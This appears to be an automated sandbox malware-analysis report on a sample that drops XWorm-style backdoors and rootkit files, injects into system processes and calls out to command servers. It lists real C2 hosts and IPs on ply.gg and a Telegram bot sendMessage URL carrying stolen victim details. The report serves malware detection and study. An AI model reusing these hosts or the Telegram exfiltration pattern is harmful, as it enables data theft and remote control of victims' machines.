                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                           Source: C:\Users\Public\Deadsvchost.exe | Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                           Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_00000001400022FC
                           Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A097D80 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_000002E86A097D80
                           Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                           Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, DeadXClient.exe, 00000001.00000002.3027772809.000000001B9AD000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B24A000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C232000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2927052039.0000000000653000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C238000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                           Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.25.dr | Binary or memory string: MsMpEng.exe
                           Source: C:\Users\Public\DeadXClient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                           Source: C:\Users\Public\DeadXClient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                           Source: C:\Users\Public\DeadXClient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                           Source: C:\Users\Public\DeadXClient.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                           Source: C:\Users\Public\DeadROOTkit.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                           Source: C:\Users\Public\DeadROOTkit.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                           Stealing of Sensitive Information

                           Source: Yara match | File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                           Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                           Source: Yara match | File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                           Source: Yara match | File source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
                           Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                           Source: Yara match | File source: C:\Users\Public\DeadXClient.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: sslproxydump.pcap, type: PCAP

                           Remote Access Functionality

                           Source: Yara match | File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                           Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                           Source: Yara match | File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
                           Source: Yara match | File source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                           Source: Yara match | File source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                           Source: Yara match | File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                           Source: Yara match | File source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
                           Source: Yara match | File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                           Source: Yara match | File source: C:\Users\Public\DeadXClient.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                           Source: Yara match | File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                           Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                           MITRE ATT&CK Matrix (reconstructed from the report's flattened matrix; each tactic column is listed top to bottom. A leading number is the hit counter the report renders beside a matched technique, reproduced as extracted; techniques without a counter are the unmatched remainder of the matrix.)

                           Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations; Business Relationships
                           Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server; Server
                           Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain; Trusted Relationship
                           Execution: 12 Windows Management Instrumentation; 11 Native API; 12 Command and Scripting Interpreter; 12 Scheduled Task/Job; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic
                           Persistence: 1 DLL Side-Loading; 12 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                           Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 813 Process Injection; 12 Scheduled Task/Job; 121 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                           Defense Evasion: 11 Disable or Modify Tools; 111 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Install Root Certificate; 3 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 4 Rootkit; 121 Masquerading; 1 Modify Registry; 151 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 813 Process Injection; 1 Hidden Files and Directories
                           Credential Access: 1 Credential API Hooking; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                           Discovery: 1 System Time Discovery; 2 File and Directory Discovery; 34 System Information Discovery; 661 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery; Local Groups
                           Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
                           Collection: 11 Archive Collected Data; 1 Credential API Hooking; 1 Input Capture; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection; Local Email Collection
                           Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy; Internal Proxy
                           Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port
                           Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service; Direct Network Flood

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                           Behavior Graph (ID: 1532627, Sample: mIURiU8n2P.exe, Startdate: 13/10/2024, Architecture: WINDOWS, Score: 100), rendered here as a process tree reconstructed from the graph's nodes and edges:

                           Sample level: DNS/IP: subscribe-bond.gl.at.ply.gg; ip-api.com. Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 36 other signatures.

                           mIURiU8n2P.exe (started)
                             dropped: C:\Users\Public\DeadXClient.exe (PE32); C:\Users\Public\DeadROOTkit.exe (PE32); C:\Users\Public\DeadCodeRootKit.exe (PE32); C:\Users\user\AppData\...\mIURiU8n2P.exe.log (CSV)
                             signatures: Drops PE files to the user root directory; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                             -> DeadROOTkit.exe (started)
                                  network: ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States; api.telegram.org 149.154.167.220, 443, 49739 TELEGRAMRU United Kingdom; updates-full.gl.at.ply.gg 147.185.221.20, 49740, 49838, 49851 SALSGIVERUS United States
                                  dropped: C:\Users\user\AppData\Local\DeadROOTkit.exe (PE32)
                                  signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Protects its processes via BreakOnTermination flag; 4 other signatures
                                  -> powershell.exe (started): Loading BitLocker PowerShell Module
                                       -> conhost.exe (started)
                                  -> powershell.exe (started)
                                       -> conhost.exe (started)
                                  -> Deadsvchost.exe (started)
                             -> DeadXClient.exe (started)
                                  network: subscribe-bond.gl.at.ply.gg 147.185.221.21, 28600, 49731, 49738 SALSGIVERUS United States
                                  dropped: C:\Users\Public\Deadsvchost.exe (PE32)
                                  signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file; Creates multiple autostart registry keys; 2 other signatures
                                  -> schtasks.exe (started)
                                       -> conhost.exe (started)
                             -> DeadCodeRootKit.exe (started)
                           powershell.exe (started)
                             signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Found suspicious powershell code related to unpacking or dynamic code loading; Injects a PE file into a foreign processes
                             -> dllhost.exe (started)
                                  signatures: Injects code into the Windows Explorer (explorer.exe); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 3 other signatures
                                  -> lsass.exe (injected): Installs new ROOT certificates; Writes to foreign memory regions
                                  -> svchost.exe (injected): System process connects to network (likely due to code injection or exploit)
                                  -> svchost.exe (injected): network to api.telegram.org, updates-full.gl.at.ply.gg, subscribe-bond.gl.at.ply.gg; Uses the Telegram API (likely for C&C communication)
                                  -> 25 other processes (injected)
                             -> conhost.exe (started)
                           Deadsvchost.exe (started): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                           Deadsvchost.exe (started)

Source | Detection | Scanner | Label | Link
mIURiU8n2P.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.IPCheckDCRat |
mIURiU8n2P.exe | 67% | Virustotal | | Browse
mIURiU8n2P.exe | 100% | Avira | TR/Dropper.Gen2 |
mIURiU8n2P.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\DeadROOTkit.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\Public\DeadXClient.exe | 100% | Avira | HEUR/AGEN.1305769 |
C:\Users\Public\DeadCodeRootKit.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
C:\Users\Public\Deadsvchost.exe | 100% | Avira | HEUR/AGEN.1305769 |
C:\Users\Public\DeadROOTkit.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\DeadROOTkit.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\DeadXClient.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\DeadCodeRootKit.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\Deadsvchost.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\DeadROOTkit.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\DeadCodeRootKit.exe | 92% | ReversingLabs | ByteCode-MSIL.Infostealer.Tinba |
C:\Users\Public\DeadCodeRootKit.exe | 82% | Virustotal | | Browse
C:\Users\Public\DeadROOTkit.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\Public\DeadROOTkit.exe | 64% | Virustotal | | Browse
C:\Users\Public\DeadXClient.exe | 96% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\Public\DeadXClient.exe | 71% | Virustotal | | Browse
C:\Users\Public\Deadsvchost.exe | 96% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\Public\Deadsvchost.exe | 71% | Virustotal | | Browse
C:\Users\user\AppData\Local\DeadROOTkit.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm |
C:\Users\user\AppData\Local\DeadROOTkit.exe | 64% | Virustotal | | Browse
                          No Antivirus matches
Source | Detection | Scanner | Label | Link
subscribe-bond.gl.at.ply.gg | 8% | Virustotal | | Browse
updates-full.gl.at.ply.gg | 4% | Virustotal | | Browse
ip-api.com | 0% | Virustotal | | Browse
api.telegram.org | 2% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://ip-api.com | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2004/09/policy | 0% | Virustotal | | Browse
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | 0% | Virustotal | | Browse
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
https://api.telegram.org | 1% | Virustotal | | Browse
https://github.com/Pester/Pester | 1% | Virustotal | | Browse
http://schemas.xmlsoap.org/wsdl/erties | 0% | Virustotal | | Browse
http://schemas.xmlsoap.org/wsdl/soap12/ | 0% | Virustotal | | Browse
https://api.telegram.org/bot | 4% | Virustotal | | Browse
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | 0% | Virustotal | | Browse
subscribe-bond.gl.at.ply.gg | 8% | Virustotal | | Browse
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text= | 2% | Virustotal | | Browse
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | 0% | Virustotal | | Browse
http://api.telegram.org | 2% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
updates-full.gl.at.ply.gg | 147.185.221.20 | true | true | | unknown
subscribe-bond.gl.at.ply.gg | 147.185.221.21 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro | true | | unknown
subscribe-bond.gl.at.ply.gg | true | | unknown
http://ip-api.com/line/?fields=hosting | true | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1899586399.0000011113AA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org | DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/bot | mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.1779642673.0000011104DE4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq | Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.dr | false | | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | svchost.exe, 0000001A.00000002.2962138490.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0% | DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.msoftP | svchost.exe, 00000016.00000002.3001209327.000001845BB84000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text= | DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
